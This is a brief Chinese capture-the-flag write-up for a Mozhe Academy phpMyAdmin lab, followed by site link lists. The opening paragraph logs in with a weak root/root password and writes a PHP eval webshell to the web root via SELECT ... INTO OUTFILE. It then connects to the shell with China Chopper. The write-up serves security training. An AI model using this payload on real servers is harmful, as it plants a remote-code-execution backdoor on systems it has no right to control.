墨者學院---phpMyAdmin後臺文件包含分析溯源--解題思路
進入後臺,使用弱口令嘗試登入 如admin~admin,root-root等 本題爲root-root 點到SQL,發現可以進行sql語句 select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’ 3.執行成功 4.上菜刀 5.在根目錄可以找到本題所需要的key 在www/html目錄中可以找到寫入的一句話木馬
相關文章
- 1. 07#墨者靶場-phpMyAdmin後臺文件包含分析溯源
- 2. 墨者學院 -- WebShell文件上傳分析溯源(第2題)
- 3. 墨者學院 - WebShell文件上傳分析溯源(第2題)
- 4. 墨者學院———WebShell文件上傳漏洞分析溯源
- 5. 【墨者學院writeup】WebShell文件上傳漏洞分析溯源(第2題)題目思路
- 6. 墨者學院 - CMS系統漏洞分析溯源(第4題)
- 7. 墨者學院-CMS系統漏洞分析溯源(第5題)
- 8. 墨者學院 - CMS系統漏洞分析溯源(第9題)
- 9. 墨者學院_CMS系統漏洞分析溯源(第4題)
- 10. 墨者學院 - 編輯器漏洞分析溯源(第1題)
- 更多相關文章...
- • PHP 包含文件 - PHP教程
- • TCP報文格式解析 - TCP/IP教程
- • 適用於PHP初學者的學習線路和建議
- • IntelliJ IDEA中SpringBoot properties文件不能自動提示問題解決
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. Window下Ribbit MQ安裝
- 2. Linux下Redis安裝及集羣搭建
- 3. shiny搭建網站填坑戰略
- 4. Mysql8.0.22安裝與配置詳細教程
- 5. Hadoop安裝及配置
- 6. Python爬蟲初學筆記
- 7. 部署LVS-Keepalived高可用集羣
- 8. keepalived+mysql高可用集羣
- 9. jenkins 公鑰配置
- 10. HA實用詳解
歡迎關注本站公眾號,獲取更多信息
相關文章